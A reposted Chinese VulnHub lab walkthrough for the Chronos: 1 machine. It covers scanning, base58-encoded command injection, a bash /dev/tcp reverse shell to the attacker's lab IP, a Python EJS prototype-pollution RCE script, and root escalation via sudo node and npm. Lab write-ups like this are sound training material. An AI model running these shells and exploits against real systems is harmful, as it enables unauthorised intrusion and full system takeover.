栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

VulnHub日记(十八):Chronos: 1

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

VulnHub日记(十八):Chronos: 1

参考链接

Vulnhub:
参考博客
GTFOBins

开始练习

本机ip:192.168.56.102
目的机ip:192.168.56.126

fping -aqg 192.168.56.0/24


nmap 扫描主机

nmap -A -T4 -v 192.168.56.126

扫描目录无果,开放22,80和8000,访问


内容相似,bp抓包,发现参数format

将内容进行识别,可能是base64或base58

两个都测试后,是base58

bp去除参数,查看结果比较,猜测是date命令

使用pwd测试,确认可以rce


拼接获取webshell

&& bash -c 'bash -i >& /dev/tcp/192.168.56.102/4396 0>&1‘

base58编码

5ZUquXDzLaQ9v2JVGCs7yoNZW1yoG6jzAs7NYSJLVTF2XfF9FH3MnsGKCnp1cqZKA9M7QmAmv3iy5x

kali开启监听端口

nc -nvlp 4396


回退,有一个该应用的第二个版本,backend文件夹里有一个express-fileupload版本有已知漏洞可以提升权限

利用脚本原文链接

##############################################################
# Run this .py to perform EJS-RCE attack
# referenced from
# https://blog.p6.is/Real-World-JS-1/
# 
# Timothy, 10 November 2020
##############################################################

### imports
import requests

### commands to run on victim machine
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.102/4396 0>&1"'

print("Starting Attack...")
### pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

### execute command
requests.get('http://127.0.0.1:8080')
print("Finished!")

kali开启httpserver,webshell中使用wget或curl将脚本存入靶机

kali上:  python -m SimpleHTTPServer
cd /tmp
curl http://192.168.56.102:8000/exp1.py
./exp1.py



再开启一个监听端口,执行脚本,获取用户shell

sudo -l 


尝试npm和node提权,node成功了

node部分

资料链接

sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'

npm部分

资料链接

TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i

FLAG

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/733722.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号